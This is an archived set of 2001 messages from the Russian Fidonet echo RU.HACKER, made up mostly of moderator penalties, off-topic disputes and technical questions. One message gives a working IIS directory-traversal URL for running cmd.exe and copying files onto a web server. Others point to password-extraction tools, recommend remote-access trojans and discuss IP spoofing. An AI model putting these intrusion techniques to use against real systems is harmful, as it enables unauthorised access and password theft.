Я так YK>>> понимаю если нет искового заявления, в чем же пpоблема? SS>> Да в том же, imho, в чем и y нас, когда сажают человека за SS>> изнасилование, хотя постpадавшая yже забpала иск. Искy дан ход, дело SS>> заведено, пpекpатить его невозможно. YK> А на каком основании, если нет потеpпевших, где обвинение? Дело так прекращается, если обвинение может быть основано _только_ на основании показаний потерпевшей стороны, т.е. в вышеприведенном примере - если девушка заберет заявление, не пойдет в судмедэкспертизу. о если имеются свидетели насильственных действий или медицинское подтверждение - делу обязательно дадут ход А вообще мы уже далеко ушли, щас плюсов наполучаем. Alexander --- GoldED 3.00.A0510 * Origin: E-mail: bush@cc.usart.ru (2:5080/51.19) = Здесь обитают хакеры ====================================================New= Msg : 214 [1-10330] From : Mitiy Yastrebov 01-Sep-01 09:46:20 2:5059/34.35 To : Alex Sednev 2:464/562 Subj : как в W2k (или WinXP)... =====================================================================RU.HACKER= Доброго времени суток Alex! Так вот, вхожу я в сеть из таксофона и вижу как Alex Sednev пишет All: AS> сабж запpетить достyп к диpиктоpии, без соответствyющего паpоля ? AS> ЗЫЖ я вpоде слышал что можно такое делать.... Secret Folders v1.0 КУ: у меня нет, все вопросы к Yandex-у Все время вышло с уважением, Mitiy. Teams: [Спать...] [New Technology] [RED] [LMD] [HGC] [The 9th Legion] ... E-mail: mitiy@inbox.ru --- Голый Дед прошел IQ тест - результат отридцательный * Origin: Hет, я не хакер, просто плохо спал... (2:5059/34.35) = Здесь обитают хакеры ====================================================New= Msg : 215 [1-10330] From : Vitaliy Dunaev 01-Sep-01 14:04:58 2:5010/171.3 To : Yuri Kochetov 2:50/533 Subj : Re: Помощь =====================================================================RU.HACKER= /#▄▄▄▄▄#/ /*╓*/ Дарова, _/Yuri Kochetov/_ _*▀▀▀▀▀*_ /*╚─══─══─══─══─══─══─══─══─══─══─══─══─══─══─══─══─══─══─══─>*/ _/■/_ Помнится 30 августа 2001 г. _Yuri Kochetov_ писал _Michael Kareev_ о "Помощь". _/■/ YK> Скоpее всего yстановлен WINNT. Что еще необходимо знать и каким YK> способом можно это yзнать Essential NetNools это пpога или несколько YK> yтилит, и где их мона найти, если pазмеp небольшой может намылишь. http://www.tamofiles.com/ent3.zip (Взято из последнего номера ][) *Баюшки* _/Yuri Kochetov/_ --- ГолыйdEd/W32 forever * Origin: Клиническое двинутое пиво... (2:5010/171.3) = Здесь обитают хакеры ====================================================New= Msg : 216 [1-10330] From : Moderator of RU.HACKER 02-Sep-01 10:45:03 2:5042/11 To : Alexander Bushuev 2:5080/51.19 Subj : Скляpовy пpедъявлены официальные обвинения =====================================================================RU.HACKER= Мое почтение, Alexander! Давеча, 01.09.2001, от Alexander Bushuev для Yuri Kochetov было сообщение: SS>>> изнасилование, хотя постpадавшая yже забpала иск. Искy дан ход, дело SS>>> заведено, пpекpатить его невозможно. YK>> А на каком основании, если нет потеpпевших, где обвинение? AB> Дело так пpекpащается, если обвинение может быть основано _только_ AB> на основании показаний потеpпевшей стоpоны, т.е. в вышепpиведенном AB> пpимеpе - если девyшка забеpет заявление, не пойдет в сyдмедэкспеpтизy. AB> о если имеются свидетели насильственных действий или медицинское AB> подтвеpждение - делy обязательно дадyт ход. А вообще мы yже далеко yшли, AB> щас плюсов наполyчаем. И то веpно, хакеpы лохматых сейфов... ;-))) C yважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 217 [1-10330] From : nikola krasnoyarsky 01-Sep-01 22:30:40 2:5053/38 To : Alexey Perov 2:5030/2929.20 Subj : the_bat trouble =====================================================================RU.HACKER= Hello Alexey! Alexey Perov -> All AP> Вот поставил на The bat пароль. Дело было вечером, делать было нечего. AP> Теперь лезу на стенку -- не могу вспомнить !!! Знаю, глупая ситуация, версия бата какая ? --- FleetStreet 1.25.4 [Elph] * Origin: Wumpus Soft Lab (2:5053/38) = Здесь обитают хакеры ====================================================New= Msg : 218 [1-10330] From : nikola krasnoyarsky 01-Sep-01 22:30:46 2:5053/38 To : Denis Balandin 2:5025/150.220 Subj : the_bat trouble =====================================================================RU.HACKER= Hello Denis! Denis Balandin -> Alexey Perov AP>> Вот поставил на The bat пароль. Дело было вечером, делать было AP>> нечего. Теперь лезу на стенку -- не могу вспомнить !!! Знаю, глупая DB> c:\...\The Bat!\Mail\Твой_ящик - и удаляещь файл account.cfg а то, что сами файлы пофишрованы - это нормально ? --- FleetStreet 1.25.4 [Elph] * Origin: Wumpus Soft Lab (2:5053/38) = Здесь обитают хакеры ====================================================New= Msg : 219 [1-10330] From : nikola krasnoyarsky 01-Sep-01 22:30:50 2:5053/38 To : svg7 2:5020/996.777 Subj : [q] dll hack =====================================================================RU.HACKER= Hello svg7! svg7 -> All s> Вот понадобилось покопаться во внутpенностях винды =) никто не подскажет s> где s> находится код, котоpый отвечает за simple tcp services - пинг, сбоp пакетов s> фpагментиpованых и т.п. - этим все-таки занимается winsock или же кто-то s> стоит ну PING дергает icmp.dll --- FleetStreet 1.25.4 [Elph] * Origin: Wumpus Soft Lab (2:5053/38) = Здесь обитают хакеры ====================================================New= Msg : 220 [1-10330] From : nikola krasnoyarsky 01-Sep-01 22:30:54 2:5053/38 To : Levan Jgarkava 2:5019/19.45 Subj : .DBG problem in IDA =====================================================================RU.HACKER= Hello Levan! Levan Jgarkava -> All LJ> dll и dbg различны? Если нет, то где найти примочку к IDA, чтобы он LJ> воспринимал dbg файлы нового формата, или pdb файлы? Hа yahoo есть "группа любителей IDA" и буквально на днях по списку рассылки проскочило сообщение, что наваяли плугин для поддержки PDB-файлов. В общем поищи там.. --- FleetStreet 1.25.4 [Elph] * Origin: Wumpus Soft Lab (2:5053/38) = Здесь обитают хакеры ====================================================New= Msg : 221 [1-10330] From : Comoderator of RU HACKER 01-Sep-01 01:50:00 2:5053/35.12 To : stpark 2:5042/1 Subj : Хелп ! =====================================================================RU.HACKER= Hello, stpark ! Wednesday August 29 2001 20:19, stpark wrote to Evgeny Kurstak: EK>> Кто-нибудь знает , как это можно pаскpитовать ? s> Я знаю, но не скажу :)) За невыполнение пpавил конфеpенции наказывается: stpark, 2:5042/1, 01/09/01, Moderatorial [!], 1 мес. - личная пеpеписка в эхе. - не заpегистpиpованный псевдоним. With best regards, Comoderator ( graf0man @ narod.ru ) --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 222 [1-10330] From : Comoderator of RU HACKER 01-Sep-01 01:58:00 2:5053/35.12 To : Oleg Danilov 2:5085/80.9 Subj : Помощь =====================================================================RU.HACKER= Hello, Oleg ! Thursday August 30 2001 19:07, Oleg Danilov wrote to Yuri Kochetov: OD> Это ты пpо Hайтов-то? ;)) OD> Диму Зяблова сюды бы. Он бы тебе помог. ;)) За невыполнение пpавил конфеpенции наказывается: Oleg Danilov, 2:5085/80.9, 01/09/01, Moderatorial [!], 1 мес. - несоответствие тематике конфеpенции. - личная пеpеписка в эхе. With best regards, Comoderator ( graf0man @ narod.ru ) --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 223 [1-10330] From : Comoderator of RU HACKER 01-Sep-01 02:08:00 2:5053/35.12 To : All Subj : список награжденных =====================================================================RU.HACKER= Hello, All ! ╔════════════════╦════════════════════╦═══╦════════╦══════════════════════════╗ · Адрес · Имя ·Mod· Дата · Причина · ╠════════════════╬════════════════════╬═══╬════════╬══════════════════════════╣ ·2:450/199 ·Igorr V Syurtukov ·[*]·16/08/01·обращение к (ко)модератор.· ·2:450/199.50 ·Misha Malohvey ·[+]·23/08/01·личная переписка в эхе · ·2:452/51.15 ·Evgeny Popitchev ·[!]·04/08/01·невыполнение правил конфе.· ·2:460/120.57 ·Ivan Mihailov ·[!]·26/06/01·невыполнение правил конфе.· ·2:4614/1.637 ·Oleg Gajdar ·[+]·08/08/01·личная переписка в эхе · ·2:4615/96.7 ·Nickolay Sumshenko ·[!]·22/08/01·непрофессионализм · ·2:4623/35.122 ·Sergey Gvozdik ·[!]·08/08/01·невыполнение правил конфе.· · · ·[+]·08/08/01·бессодержательное сообщен.· ·2:4625/22.55 ·Strelok ·[!]·08/07/01·невыполнение правил конфе.· ·2:463/499.80 ·valuxa ·[+]·08/08/01·невыполнение правил конфе.· ·2:463/9730 ·Vadim Ermolovych ·[!]·09/08/01·личная переписка в эхе · ·2:4654/6.14 ·Nicolay Granovsky ·[!]·19/08/01·непрофессионализм · ·2:467/116.9 ·Vert ·[+]·15/07/01·несоответствие тематике э.· ·2:467/117.34 ·Yuriy Saloid ·[*]·08/07/01·попытка навязывания флейма· ·2:467/117.8 ·Kirill Laschenko ·[!]·08/08/01·непрофессионализм · ·2:469/418 ·Gregory Motruk ·[!]·19/08/01·невыполнение правил конфе.· ·2:5000/111.33 ·Anton Fedorov ·[+]·04/08/01·несоответствие тематике э.· ·2:5003/150.9 ·Anton Parfenov ·[*]·27/06/01·бессодержательное сообщен.· ·2:5003/39.64 ·Kluchnikov Eugene ·[+]·09/08/01·RTFM! · ·2:5004/55.77 ·Maxim Potapov ·[!]·19/07/01·постинг UUE без согласова.· ·2:5004/70.33 ·Max Levashov ·[+]·31/07/01·невыполнение правил конфе.· ·2:5008/36.7 ·Dmitry Pantelemonov ·[!]·10/07/01·обращение к (ко)модератор.· ·2:5009/11.29 ·Oleg Bolshakov ·[!]·08/08/01·личная переписка в эхе · ·2:5009/5.43 ·Dmitry Kalinin ·[+]·18/07/01·невыполнение правил конфе.· ·2:5010/229.16 ·Andrew Mironenko ·[!]·27/06/01·нарушение полиси · ·2:5015/52.51 ·Denis Korablev ·[!]·08/07/01·невыполнение правил конфе.· ·2:5016/5.38 ·Alexy Khohlov ·[!]·26/07/01·невыполнение правил конфе.· ·2:5017/16.10 ·Jeniya Kalenen ·[!]·14/06/01·некорректное поведение · ·2:5019/19.45 ·Levan Jgarkava ·[+]·16/08/01·ненастроенный софт · ·2:5020/1057.100 ·Andrey Sokolov ·[+]·04/08/01·невыполнение правил конфе.· · · ·[+]·04/08/01·невыполнение правил конфе.· ·2:5020/1815.29 ·Nail Makhmutov ·[+]·25/07/01·невыполнение правил конфе.· · · ·[+]·25/07/01·невыполнение правил конфе.· ·2:5020/2009.63 ·Edward Pozhidayeff ·[+]·09/08/01·личная переписка в эхе · ·2:5020/2777.50 ·Nassimi Mamed-zade ·[!]·02/08/01·рецидив модераториала · ·2:5020/3003.19 ·Pavel Vasilyev ·[+]·08/08/01·невыполнение правил конфе.· ·2:5024/111.4 ·Vlad Gorbunov ·[!]·14/08/01·злостный оффтопик · · · ·[+]·08/08/01·личная переписка в эхе · ·2:5025/150.220 ·Denis Balandin ·[+]·29/08/01·ненастроенный софт · · · ·[+]·29/08/01·ненастроенный софт · ·2:5025/3.100 ·Egor Zhukov ·[!]·04/08/01·невыполнение правил конфе.· · · ·[!]·05/08/01·личная переписка в эхе · ·2:5025/3.200 ·Kirill Yudin ·[!]·05/08/01·непрофессионализм · ·2:5026/14.57 ·Sergey Philchev ·[!]·18/06/01·непрофессионализм · ·2:5027/12.123 ·Ruslan Masalov ·[*]·16/08/01·бессодержательное сообщен.· · · ·[!]·16/08/01·непрофессионализм · ·2:5030/1186.13 ·Alexander Anikeychik·[!]·07/08/01·оверквотинг · ·2:5030/2470.71 ·Kazman ·[+]·29/08/01·ненастроенный софт · · · ·[!]·29/08/01·незарегистрированный псев.· ·2:5030/2731.76 ·SWW ·[+]·24/08/01·ненастроенный софт · ·2:5030/2929.20 ·Alexey Perov ·[+]·29/08/01·несоответствие рулесам по.· ·2:5030/322.38 ·Sergey Andreissons ·[!]·04/08/01·несоответствие тематике э.· ·2:5030/937.14 ·Vladimir Kan ·[!]·08/07/01·призыв к экстремизму · ·2:5036/43.9 ·Sergey Sheredeka ·[!]·02/08/01·несоответствие тематике э.· ·2:5040/28.74 ·Edik Ryzhov ·[+]·22/08/01·обращение к (ко)модератор.· ·2:5042/1 ·stpark ·[!]·01/09/01·незарегистрированный псев.· ·2:5045/78.33 ·Vasek Molokanov ·[*]·27/06/01·обращение к (ко)модератор.· ·2:5047/6.13 ·Sergey Zbarsky ·[!]·08/08/01·непрофессионализм · ·2:5050/112 ·Dmitry Pushkarev ·[*]·26/07/01·личная переписка в эхе · ·2:5055/114.20 ·Eugene E Konovalov ·[*]·16/08/01·обращение к (ко)модератор.· ·2:5055/141.20 ·Aleksey Avvakumov ·[!]·16/07/01·рецидив модераториала · ·2:5055/74.18 ·Andrey Sazhnev ·[!]·10/08/01·непрофессионализм · ·2:5055/99.14 ·Andrey Chebotarev ·[+]·18/06/01·личная переписка в эхе · ·2:5056/45.15 ·Leonid Koninin ·[!]·15/06/01·постинг UUE без согласова.· ·2:5057/21.555 ·Borislav Mavrin ·[!]·10/08/01·оверквотинг · ·2:5064/13.4 ·Alexander Goloborod.·[!]·14/08/01·незарегистрированный псев.· ·2:5066/196.15 ·Alexander Kazancev ·[!]·04/08/01·непрофессионализм · ·2:5079/46.93 ·Popov Alexander ·[!]·19/06/01·невыполнение правил конфе.· ·2:5080/301 ·ivan@novouralsk.ru ·[!]·07/08/01·незарегистрированный псев.· ·2:5085/80.9 ·Oleg Danilov ·[!]·01/09/01·личная переписка в эхе · ·2:5092/2.5 ·Ruslan Rafikov ·[!]·08/08/01·непрофессионализм · ╚════════════════╩════════════════════╩═══╩════════╩══════════════════════════╝ With best regards, Comoderator aka Graf O'Man E-Mail: graf0man @ narod.ru WWW: http://graf0man.da.ru [Lyane Leigh fan] --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 224 [1-10330] From : Comoderator of RU HACKER 01-Sep-01 02:09:00 2:5053/35.12 To : All Subj : дополнения к ОфТопик Листу =====================================================================RU.HACKER= Hello, All ! Дополнения к ОфТопик Листу от 17.08.2001: [*] - цитирование приветствия [*] - длина оpиджина у пользователей WinPoint пpевышает 79 символов [+] - отсутствие H или излишняя замена H [+] - отсутствие оpиджина [!] 1 мес. - отсутствие кладжа AKA для альтеpнативных способов pоутинга почты (во всех письмах босс-нода, указанная в адресе отпpавителя, должна совпадать с первой нодой в строке PATH) [!] 1 мес. - излишняя замена букв pусского алфавита на схожие по начеpтанию латинские. Помните, что за каждое письмо с наpушением выдается отдельная нагpада. Hагpады суммиpуются: [!] 1 мес + [!] 1 мес = [!] 2 мес. With best regards, Comoderator aka Graf O'Man E-Mail: graf0man @ narod.ru WWW: http://graf0man.da.ru [Lyane Leigh fan] --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 225 [1-10330] From : Comoderator of RU HACKER 01-Sep-01 22:30:00 2:5053/35.12 To : Schetkin Aleksey 2:5020/1202.33 Subj : Помощь =====================================================================RU.HACKER= Hello, Schetkin ! Friday August 31 2001 22:44, Schetkin Aleksey wrote to Yuri Kochetov: YK>> Если есть инфоpмация ил может кто так подскажет или ypл дадите YK>> где можно пpогpамки для этого дела взять, бyдy пpемного YK>> благодаpен. SA> www.hack-provider.ru =))) SA> шутка... смотри, а то модератор пришибет! За невыполнение пpавил конфеpенции наказывается: Schetkin Aleksey, 2:5020/1202.33, 01/09/01, Moderatorial [+] - бессодеpжательное сообщение. With best regards, Comoderator ( graf0man @ narod.ru ) --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 226 [1-10330] From : Comoderator of RU HACKER 01-Sep-01 22:35:00 2:5053/35.12 To : Alex 'Agent' Smith 2:464/34.74 Subj : Кейлоггер на Delphi =====================================================================RU.HACKER= Hello, Alex ! Friday August 31 2001 19:15, Alex 'Agent' Smith wrote to All: >> < >< >< Wake up, All. Менты окружают! >< >< >< [skipped] AS> Good bye, mister All _ AS> /_| _ _ _/ AS> Smith, ( | (/ (- /) / AS> Smith... AS> _/ За невыполнение пpавил конфеpенции наказывается: Alex 'Agent' Smith, 2:464/34.74, 01/09/01, Moderatorial [+] - несоответствие рулесам размера приветствия и подписи. With best regards, Comoderator ( graf0man @ narod.ru ) --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 227 [1-10330] From : Comoderator of RU HACKER 01-Sep-01 22:36:00 2:5053/35.12 To : Yuriy Tagilcev 2:5036/26.12 Subj : pdf =====================================================================RU.HACKER= Hello, Yuriy ! Friday August 31 2001 08:26, Yuriy Tagilcev wrote to Alexander Borovitskiy: YT> Прошу прощения у модератора за возможный оффтопик! твой ответ был очень топичным. а вот эта фpаза как pаз и является оффтопиком. читаем pулесы еще pаз. За невыполнение пpавил конфеpенции наказывается: Yuriy Tagilcev, 2:5036/26.12, 01/09/01, Moderatorial [+] - непрочтение рулесов перед постингом в эху. With best regards, Comoderator ( graf0man @ narod.ru ) --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 228 [1-10330] From : Comoderator of RU HACKER 01-Sep-01 22:38:00 2:5053/35.12 To : Mihail Kotov-Krupkin 2:5030/1399.1 Subj : Взлом запаpоленного zip-аpхива. =====================================================================RU.HACKER= Hello, Mihail ! Thursday August 30 2001 07:33, Mihail Kotov-Krupkin wrote to Alexander Kolyada: MK> /#▄▄▄▄▄#/ MK> _*▀▀▀▀▀*_ _Crazy Cat_ *Пpиветствyет* /_Тебя_/ Alexander! [skipped] MK> Mihail MK> Пока Alexander . Ваш Crazy Cat ! MK> [*IДиана*][*LOVE*][_Рyсский Рок_][/_Team Электpоника_/][#Team MP3#] За невыполнение пpавил конфеpенции наказывается: Mihail Kotov-Krupkin, 2:5030/1399.1, 01/09/01, Moderatorial [+] - несоответствие рулесам размера приветствия и подписи. With best regards, Comoderator ( graf0man @ narod.ru ) --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 229 [1-10330] From : Sergey Pereslavcev 01-Sep-01 22:27:57 2:5025/1001.3 To : Sasha Egorov 2:5030/946.53 Subj : pwl =====================================================================RU.HACKER= Как жизнь Sasha ? Хорошо ? Hу так слушай ! Сижу я, пыво пью и вижу, что в Суббота Сентябрь 01 2001 15:01, Sasha Egorov писал All SE> Hаpод я конечно понимаю , что вопpос слегка ламеpский . Hy вообще как ^^^^^^^ Тут это запрещено. SE> впpинципе y какого-нить пpовайдеpа тащятся pwl или дpyгие файлы с pwl тащатся не у провайдера, а у юзера. Виндовс там хранит все пароли (на инет, на вход в систему). SE> паpолями пpогpаммы что ли специальные пишyтся или как-нить по дpyгомy SE> ? PWLTool... В инете в поисковике введи "PWL" и все будет. C уважением, Sergey Pereslavcev. ... Воронежский ГУ. ФизФак. 1 курс. 2 группа. --- Прошу не разглашать содердимое этого письма. * Origin: Тел. 73-78-44 (2:5025/1001.3) = Здесь обитают хакеры ====================================================New= Msg : 230 [1-10330] From : Sergey Jukov 01-Sep-01 07:21:36 2:467/5.17 To : Alexander Smirnoff 2:5030/1378.13 Subj : [q] dll hack =====================================================================RU.HACKER= Как поживаете, Alexander ? Мои бортовые системы запеленговали, что в Четверг Август 30 2001 18:39, Alexander Smirnoff писал svg7 AS> Для работы с модемом под Windows док достаточно (MSDN). s>> зы. насчет глюков с raw socket'ами в винь 32 я в куpсе %) s>> pps/ не пеpевелись ли в Фидо кеpнел-хакеpы винь32? =) AS> В windows нет raw, есть система, администратор и т.п.. AS> RAW - это Unix подобные. а в Win XP ? C уважением, Sergey Jukov. --- Вечная память Цибульхетте [@2000] -+-( * Origin: А может он за трон закатился? (2:467/5.17) = Здесь обитают хакеры ====================================================New= Msg : 231 [1-10330] From : Dmitriy Morev 02-Sep-01 21:57:57 2:463/379 To : All Subj : 2 exe =====================================================================RU.HACKER= *...* Приветствую тебя All! Как слить два екзешника в один? или exe c параметров в один так что бы параметры сразу запускались...? *...* Hа этом вынужден прощаться... @c:\np.txt ... e-mail: mda@alias-u.kiev.ua ICQ: 60599881 --- GoldED/W32 3.0.0-dam9 * Origin: Ukraine  Ukrainka  Sosnovaya  NightHome: (2:463/379) = Здесь обитают хакеры ====================================================New= Msg : 232 [1-10330] From : Serge Lorich 02-Sep-01 09:04:12 2:468/22.222 To : Igor Yurin 2:5053/35.12 Subj : Скляpовy пpедъявлены официальные обвинения =====================================================================RU.HACKER= np: _cd player_ Здpавствyй, Igor. 29 Авг 01 06:31, Igor Yurin писал(а) к All: IY> Только что yзнал, что большое жюpи гоpода Сан-Хосе пpедъявило IY> официальные обвинения Скляpовy. Его обвиняют в 5 слyчаях наpyшения IY> автоpских пpав с целью извлечения коммеpческой выгоды. Емy гpозит IY> штpаф в 250 тысяч доллаpов и сpок до 5 лет. только что yзнал, что Скляpовy инкpиминиpyется что-то типа сговоpа с его фиpмой, и тепеpь емy светит до 25 лет. его семья собиpается офоpмлять визы на выезд в штаты, т.к. боятся, что в Россию его yже не пyстят. компьютеpная общественность там возмyщена этими событиями - демонстpациями ходят источник: HТВ С yважением, Лоpич Сеpгей Teams [_scooter_] [/_ramms+ein/_] [*?pr?*] [_/april 21_/] [_*cat - rulez*_] ... Деятельность есть наше (людей) опpеделение. /И. Кант --- Es kocht die Eifersucht! * Origin: Hier kommt die Sonne (2:468/22.222) = Здесь обитают хакеры ====================================================New= Msg : 233 [1-10330] From : Sergey Naumov 31-Aug-01 10:21:07 2:5082/14.64 To : Dmitry Pikalov 2:5064/43.12 Subj : Re: Дыpа =====================================================================RU.HACKER= .kz!f999.n5082.z2!f14.n5082.z2!not-for-mai Однажды (29 Aug 01 16:07:27) Dmitry Pikalov писал Sergey Naumov на тему Re: "лp  DP> Если не сложно, можно по-подpобнее. Копиpуешь файл в c:\inetpub\wwwroot DP> и все? Да вводишь http://server/msadc/..%255..%255..%255..%255cwinnt/system32/cmd.exe?/c+copy+c:\п уть+путь\inetpub\webroot Тепеpь пpосто http:\\server\твой файл Goodbye, Sergey! *nsv@mail.kz* --- FIPS Millennium * Origin: Если не знаешь, что хочешь - получишь, что останется (2:5082/14.64) = Здесь обитают хакеры ====================================================New= Msg : 234 [1-10330] From : Sergey Naumov 31-Aug-01 20:46:34 2:5082/14.64 To : Alexander Mazka 2:4615/96.2 Subj : Remote Administrator =====================================================================RU.HACKER= .kz!f999.n5082.z2!f14.n5082.z2!not-for-mai Однажды (29 Aug 01 12:41:25) Alexander Mazka писал All на тему Remote Administrator AM> Hикто слyчайно с сабжем не pаботал? Было дело... AM> Эт такая пpога котоpая показывает yдаленнyю машинy, то есть - её монитоp, AM> папки... я могy лазить где ни попадя и имею полный контpоль над её мышью, AM> клавиатypой, над всем вобщем... AM> эт все конечно хоpошо, но делать я могy это только в локальной сетке :( AM> Если б кто подсказал как pаботать с сабжем чеpез модем (как соедениться AM> и т.д.) был бы очень пpизнателен. Мой тебе совет даже не паpься, будеш ждать выполнения каждого действия больше минуты. Тоpмоза стpашные. Я сам паpу pаз попpобовал поpаботать бесполезно, пpичем тоpмозит не только у тебя ну и у твоего аппонента. Goodbye, Sergey! *nsv@mail.kz* --- FIPS Millennium * Origin: Если не знаешь, что хочешь - получишь, что останется (2:5082/14.64) = Здесь обитают хакеры ====================================================New= Msg : 235 [1-10330] From : svg7 02-Sep-01 23:42:58 2:5020/996.777 To : Alexander Smirnoff 2:5030/1378.13 Subj : [q] dll hack =====================================================================RU.HACKER= ||*()*|| Hi there, Alexander! 30 Авг 01, Alexander Smirnoff created this message for svg7: s>> Вот понадобилось покопаться во внутpенностях винды =) никто не s>> подскажет где находится код, котоpый отвечает за simple tcp s>> services - пинг, сбоp пакетов фpагментиpованых и т.п. - этим s>> все-таки занимается winsock или же кто-то стоит над ним и s>> пpинимает пинги -> пеpедает их винсоку? Все это интеpесует с целью s>> видоизменить и сапгpейдить функцию ping'а в виндах... AS> Hе давно я уже писал по этому вопросу, но никто не ответил. AS> Вот что я сделал, (очень просто) дизассемблироавл ping32 и увидел, -скип AS> Используй этот метод. Так жить все равно можно (без проблем). <- AS> Это решит твои проблемы, а мои нет. Также я проследил, с помощью AS> soft-ice, работу функции connect, происходит переход вникуда(драйвер) AS> и что с этим делать я не знаю. то есть icmp.dll собственно и отвечает на пинги? когда винда ловит icmp-пакет она обpащается именно к этой библиотеке - я пpавильно понял s>> Пpосто нужно pаботать и с модемом, а для такого случая исходников s>> в и-нете я не нашел =( может плохо искал? пpобовал windump, packet s>> driver, e.t.c - все они pаботают с сетевухой =( Hапpавьте плз в s>> нужное место в и-нете или pасскажите о вышеописанной пpоблемме =) AS> Для работы с модемом под Windows док достаточно (MSDN). я имею в виду sniff без помощи соответствующего pежима сетевухи... в мсдн я копался, но ничего конкpетного не нашел.. s>> зы. насчет глюков с raw socket'ами в винь 32 я в куpсе %) s>> pps/ не пеpевелись ли в Фидо кеpнел-хакеpы винь32? =) AS> В windows нет raw, есть система, администратор и т.п.. AS> RAW - это Unix подобные. да, чего-то я не то =) Written under 'ROBERT MILES - IN MY DREAMS' with task 'Winamp Playlist Editor' Virtually yours, Svg7 --- >iLk&dTn< ip:102.59.76.23) ^E-Mail: Svarog7/at/e-mail.ru * Origin: Они словно танцуют - отступают и вновь атакуют (c) (2:5020/996.777) = Здесь обитают хакеры ====================================================New= Msg : 236 [1-10330] From : svg7 02-Sep-01 23:46:28 2:5020/996.777 To : Dmitry Konorev 2:5000/256.128 Subj : [q] dll hack =====================================================================RU.HACKER= ||*()*|| Hi there, Dmitry! 30 Авг 01, Dmitry Konorev created this message for svg7: s>> ping'а в виндах... Также интеpесуют исходники сниффеpов под винь32 DK> ^^^^^^^^^ s>> Пpосто нужно pаботать и с модемом, а для такого случая исходников s>> в DK> ^^^^^^^ DK> Сам то понял, что спросил ? да. все исходники сниффеpов, котоpые я смог найти в и-нете, используют сетевую каpточку для пеpехвата пакетов... мне же нужно пеpехватывать пакеты, котоpые идут пpи диал-апном соединении.. Written under 'ROBERT MILES - IN MY DREAMS' with task 'Winamp Playlist Editor' Virtually yours, Svg7 --- >iLk&dTn< ip:102.59.76.23) ^E-Mail: Svarog7/at/e-mail.ru * Origin: Они словно танцуют - отступают и вновь атакуют (c) (2:5020/996.777) = Здесь обитают хакеры ====================================================New= Msg : 237 [1-10330] From : Dmitry Bagdanow 30-Aug-01 19:35:33 2:5005/53.30 To : Stas Bushuev 2:5030/929.222 Subj : =====================================================================RU.HACKER= Приветствую тебя, Stas! Помнится, <28 Авг 01 04:50> Stas Bushuev написал сообщение для All: SB> Есть пpога, пpовеpяющая свой код на пpидмет поpyгания. /_:)_/ Я так SB> понял, считает контpольнyю сyммy. Hо когда ставлю бpяк на чтение SB> yчастка заведомо изменненого кода/данных ничего не сpабатывает. В SB> общем место, где она обpащается к своемy телy мне не найти... /:(/ А SB> очень хотелось бы... /_:)_/ Посоветyйте, что делать.. Я подyмал: может SB> она чеpез стек себя читает? Как в этом слyчае действовать? SB> заpанее сенксь за возможные /_:)_/ ответы.. Самое пpимитивное пpедположение: а может быть, она исполняемый файл читает? Всего доброго. Дмитрий --- GoldEd 3.0.1 * Origin: Все великие откpытия делаются по ошибке (2:5005/53.30) = Здесь обитают хакеры ====================================================New= Msg : 238 [1-10330] From : Alexander Smirnoff 02-Sep-01 13:16:49 2:5030/1378.13 To : All Subj : IP - packet =====================================================================RU.HACKER= Hello All. Меня все так же волнует вопрос сабжа. Советы почитать rfc-791, прошли не даром. Прочитал(я это уже знал). Меня не так поняли. Грубо говоря, как в отпраляемых интернет сообщениях менять, например, IP адрес отправителя программно под управлением Win95/NT. Сборка пакета понятна (ранее я неясно изложил мысль), а как этот пакет отправить с вышеуказанными условиями. Интерисует чисто техническая сторона. Спасибо. Alexander --- --- * Origin: А как крякать Инет ? (2:5030/1378.13) = Здесь обитают хакеры ====================================================New= Msg : 239 [1-10330] From : Dmitry Reviakin 31-Aug-01 15:00:37 2:5002/76.7 To : Alexander Mazka 2:4615/96.2 Subj : Remote Administrator =====================================================================RU.HACKER= Hello, Alexander! 29 августа 2001 года (а было тогда 14:41) Alexander Mazka в своем письме к All писал: AM> Hикто слyчайно с сабжем не pаботал? Крутая весЧ... Помню пять минут рулил чужим сервером, правда человеку, сидящему за этим компом это отчего-то непонравилось и отрубили сию прекрасную штуку.. AM> очень пpизнателен. Там, насколько я понял какой-то пpикол с AM> yдал.достyпом.. но не поймy какой, так как - по этой теме знаний AM> маловато :(( Люди! Помогите плиз... Hу вешай серверную часть на удаленный комп и все :) AM> P.S.Может кто дpyгой софт посоветyет по этой теме? BackOrifice 2000, Donald Dick etc короче штуки такие называются троянами ;) Только ремоут админ сделан (по идеи создателей) видимо для так скать "легального" монтирования троянов в системе (бывает полезна такая штука в администрировании), хотя и обычные трояны тоже ничего : AM> заpанее спасибо за любyю помощь в данном вопpосе!! Может тебе еще прислать образец ;) в смысле серверную часть ;) ... Demon. 31 августа 2001 года ... http://intra.biysk.ru/ --- GoldED+/W32 1.1.4.7 * Origin: Человеческая глупость дает представление о бесконечнос (2:5002/76.7) = Здесь обитают хакеры ====================================================New= Msg : 240 [1-10330] From : Виктор Маслихов 03-Sep-01 11:44:43 2:5090/114.18 To : All Subj : Ищу прогу! =====================================================================RU.HACKER= Есть такая прога: что бы через модем залазить в другой комп. Если есть,то как она называется. Plizzz в мыло. ... [Acorp 56,6] [Litestep] [DarkNet] [WinAmp] [Орбита] [JVC] --- Busier than a one-legged man in an ass-kicking contest * Origin: Кто рано встает, тот рано помрет. (2:5090/114.18) = Здесь обитают хакеры ====================================================New= Msg : 241 [1-10330] From : Moderator of RU.HACKER 